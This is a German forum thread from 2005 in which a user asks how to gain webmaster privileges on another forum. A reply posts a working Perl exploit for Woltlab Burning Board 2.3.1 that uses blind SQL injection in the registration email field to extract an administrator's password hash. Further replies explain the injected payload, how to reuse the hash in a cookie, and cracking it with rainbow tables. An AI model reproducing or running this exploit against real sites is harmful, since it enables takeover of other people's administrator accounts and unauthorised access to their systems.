Wie kann ich mir die gleichen Funktionen wie bei ein Webmaster habe?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von DuelKing722, 3. Juni 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 3. Juni 2005
    Also versteht das nicht falsch. Ich will nicht rush-board hacken

    Aber z.B. bei Startseite - eTCG.de - Forum wie kann ich mir genau die Funktionen wie der Webmaster erhalten???

    Weiss das jemand?

    Wäre sehr nett.
     
  3. 3. Juni 2005
    Code:
    #!/usr/bin/perl
use strict;
use IO::Socket::INET;

$| = print " Woltlab Burning Board <= 2.3.1 Exploit by XodoX\n";
my $host = 'www.meineseite.de';
my $path = '/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'Bedankomat'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzul&auml;ssig';

my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '') { print "[~] Using a proxy\n"; 
} else { print "[~] You're using NO proxy!\n";
sleep(1);
}

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";

my $hash = '';
for(my $i=1;$i<33;$i++) {
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp')
or die('[-] Could not connect to server');

if(&test($i, 96)) {
for(my $c=97;$c<103;$c++) {
if(&test($i, $c, 1)) {
print pack('c', $c);
last; }
}
} else {
for(my $c=48;$c<58;$c++) {
if(&test($i, $c, 1)) {
print pack('c', $c);
last; }
}
}
}
print "\n";

sub test {
my ($i, $num, $g) = @_;
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp')
or die("Could not connect to server");
my $value = "ZpipAxTSv\@P8d5ihhs.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";

print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";

while(<$sock>){
if($_ =~ m/$error/) { return 1; }}
return 0;
}
    Ohne Gewähr.
     
  4. 3. Juni 2005
    Das kann man ja gar nicht lesen
     
  5. 3. Juni 2005
    Copy && Paste in Texteditor?

    Außerdem ist es kein "Tutorial" sodern ein Perl-Quellcode.
     
  6. 3. Juni 2005
    dann lern es
     
  7. 3. Juni 2005
    Kann mir jemand erklären wie das funktioniert?
     
  8. 5. Juni 2005
    als was muss ich die datei speichern? pearl hat was für ne endung ???

    ps: thx gibt ne 10
     
  9. 5. Juni 2005
    Endung: pl
    unter win #!pfad_zu_perl.exe
    Nützt eine Schwachstelle in register.php aus.
    Die Variable r_email übergit normalerweise die Emailadresse.
    Hier:
    r_email=bla@blub.org' OR (userid=[benutzerid] AND ascii(substring(password,[position im pw-hash],1))=[zeichencode])/*";

    kommt keine Fehlermeldung (email not found) stimmt das Zeichen.
    Auf die Art kann man sich den md5 verschlüsselten PW-Hash ausgeben lassen.
    Dann einfach in den Cookie einbauen oder (umständlich) knacken.

    //edit: die obengenannte seite hat wohl einen Filter; daher funktioniert diese Methode nicht.

    warscheinlich sowas in der Art:
    Code:
    if(isset($_POST['r_email'])){
if (preg_match("/^[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,6}$/i", $_POST['r_email'])) {
$r_email = $_POST['r_email'];}
}else{ 
echo "just :mad: off\n";
}
     
  10. 5. Juni 2005
    Wobei das "umständlich" eigentlich zu bevorzugen ist, weil man kommt zwar
    mit dem MD5-Hash ins normale Forum durch Cookie-Editing rein - ins ACP
    allerdings nicht weil das läuft über Session-IDs und nicht über Cookies.
    Demzufolge bleibt eigentlich nur der Weg des Crackens des Hashes,
    was allerdings bei halbwegs guten Rainbow-Tables nicht das große Problem sein sollte.

    Sofern jemand andere Wege kennt --> bitte sofort sagen
     
  11. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.